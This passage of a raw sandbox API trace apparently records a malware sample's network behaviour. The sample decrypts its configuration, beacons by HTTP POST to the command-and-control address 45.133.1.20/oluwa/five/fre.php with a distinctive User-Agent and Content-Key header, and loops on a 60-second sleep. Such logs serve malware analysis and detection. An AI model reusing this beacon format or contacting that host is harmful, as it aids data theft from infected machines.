(lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0201.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.418] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0201.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.419] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0201.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.421] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0201.421] GetProcessHeap () returned 0x6a0000 [0201.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0201.421] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0201.421] GetProcessHeap () returned 0x6a0000 [0201.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9f0 [0201.421] socket (af=2, type=1, protocol=6) returned 0x540 [0201.421] connect (s=0x540, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0201.447] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0201.447] GetProcessHeap () returned 0x6a0000 [0201.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0201.447] GetProcessHeap () returned 0x6a0000 [0201.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0201.448] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0201.450] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0201.450] GetProcessHeap () returned 0x6a0000 [0201.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0201.450] GetProcessHeap () returned 0x6a0000 [0201.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0201.450] GetProcessHeap () returned 0x6a0000 [0201.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0201.451] GetProcessHeap () returned 0x6a0000 [0201.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0201.451] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0201.454] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0201.454] GetProcessHeap () returned 0x6a0000 [0201.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0201.454] GetProcessHeap () returned 0x6a0000 [0201.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0201.455] send (s=0x540, buf=0x6b5c98*, len=242, flags=0) returned 242 [0201.456] send (s=0x540, buf=0x6bb998*, len=159, flags=0) returned 159 [0201.456] GetProcessHeap () returned 0x6a0000 [0201.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0201.456] recv (in: s=0x540, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0201.531] GetProcessHeap () returned 0x6a0000 [0201.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0201.532] GetProcessHeap () returned 0x6a0000 [0201.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0201.532] GetProcessHeap () returned 0x6a0000 [0201.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0201.533] GetProcessHeap () returned 0x6a0000 [0201.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0201.533] closesocket (s=0x540) returned 0 [0201.539] GetProcessHeap () returned 0x6a0000 [0201.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9f0 | out: hHeap=0x6a0000) returned 1 [0201.539] GetProcessHeap () returned 0x6a0000 [0201.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0201.540] GetProcessHeap () returned 0x6a0000 [0201.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0201.540] GetProcessHeap () returned 0x6a0000 [0201.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0201.541] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x510) returned 0x540 [0201.558] Sleep (dwMilliseconds=0xea60) [0201.560] GetProcessHeap () returned 0x6a0000 [0201.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0201.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.562] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0201.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.574] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0201.585] GetProcessHeap () returned 0x6a0000 [0201.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0201.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.586] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0201.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.596] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0201.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.598] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0201.598] GetProcessHeap () returned 0x6a0000 [0201.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0201.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.599] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0201.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.601] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0201.601] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.602] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0201.602] GetProcessHeap () returned 0x6a0000 [0201.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0201.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.603] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0201.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.604] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0201.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.605] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0201.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.606] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0201.606] GetProcessHeap () returned 0x6a0000 [0201.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0201.606] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0201.607] GetProcessHeap () returned 0x6a0000 [0201.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0201.608] GetProcessHeap () returned 0x6a0000 [0201.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0201.608] GetProcessHeap () returned 0x6a0000 [0201.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0201.608] GetProcessHeap () returned 0x6a0000 [0201.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0201.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.612] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0201.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.619] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0201.629] GetProcessHeap () returned 0x6a0000 [0201.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0201.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.630] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0201.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.634] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0201.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.635] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0201.635] GetProcessHeap () returned 0x6a0000 [0201.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0201.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.637] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0201.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.638] CryptDestroyKey (hKey=0x6ad020) returned 1 [0201.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.639] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0201.639] GetProcessHeap () returned 0x6a0000 [0201.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0201.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.640] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0201.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.641] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0201.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.642] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0201.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.643] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0201.643] GetProcessHeap () returned 0x6a0000 [0201.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0201.643] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0201.643] GetProcessHeap () returned 0x6a0000 [0201.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0201.644] socket (af=2, type=1, protocol=6) returned 0x544 [0201.644] connect (s=0x544, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0201.669] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0201.669] GetProcessHeap () returned 0x6a0000 [0201.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0201.669] GetProcessHeap () returned 0x6a0000 [0201.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0201.670] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0201.671] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0201.671] GetProcessHeap () returned 0x6a0000 [0201.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0201.671] GetProcessHeap () returned 0x6a0000 [0201.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0201.672] GetProcessHeap () returned 0x6a0000 [0201.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0201.672] GetProcessHeap () returned 0x6a0000 [0201.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0201.673] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0201.673] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0201.673] GetProcessHeap () returned 0x6a0000 [0201.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0201.674] GetProcessHeap () returned 0x6a0000 [0201.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0201.674] send (s=0x544, buf=0x6b5c98*, len=242, flags=0) returned 242 [0201.674] send (s=0x544, buf=0x6bb998*, len=159, flags=0) returned 159 [0201.675] GetProcessHeap () returned 0x6a0000 [0201.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0201.675] recv (in: s=0x544, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0201.744] GetProcessHeap () returned 0x6a0000 [0201.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0201.744] GetProcessHeap () returned 0x6a0000 [0201.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0201.745] GetProcessHeap () returned 0x6a0000 [0201.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0201.746] GetProcessHeap () returned 0x6a0000 [0201.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0201.746] closesocket (s=0x544) returned 0 [0201.747] GetProcessHeap () returned 0x6a0000 [0201.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0201.747] GetProcessHeap () returned 0x6a0000 [0201.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0201.748] GetProcessHeap () returned 0x6a0000 [0201.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0201.748] GetProcessHeap () returned 0x6a0000 [0201.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0201.749] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf28) returned 0x544 [0201.753] Sleep (dwMilliseconds=0xea60) [0201.754] GetProcessHeap () returned 0x6a0000 [0201.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0201.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.756] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0201.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.763] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0201.782] GetProcessHeap () returned 0x6a0000 [0201.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0201.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.783] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0201.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.784] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0201.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.788] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0201.788] GetProcessHeap () returned 0x6a0000 [0201.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0201.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.795] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0201.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.800] CryptDestroyKey (hKey=0x6ad020) returned 1 [0201.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.801] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0201.801] GetProcessHeap () returned 0x6a0000 [0201.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0201.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.802] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0201.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.803] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0201.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.805] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0201.805] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.806] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0201.806] GetProcessHeap () returned 0x6a0000 [0201.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0201.806] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0201.806] GetProcessHeap () returned 0x6a0000 [0201.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0201.807] GetProcessHeap () returned 0x6a0000 [0201.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0201.807] GetProcessHeap () returned 0x6a0000 [0201.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0201.808] GetProcessHeap () returned 0x6a0000 [0201.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0201.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.810] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0201.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.817] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0201.827] GetProcessHeap () returned 0x6a0000 [0201.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0201.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.832] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0201.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.834] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0201.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.835] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0201.835] GetProcessHeap () returned 0x6a0000 [0201.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0201.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.837] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0201.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.838] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0201.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.839] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0201.839] GetProcessHeap () returned 0x6a0000 [0201.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0201.840] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.840] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0201.841] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.842] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0201.842] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.843] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0201.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.844] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0201.844] GetProcessHeap () returned 0x6a0000 [0201.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0201.844] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, 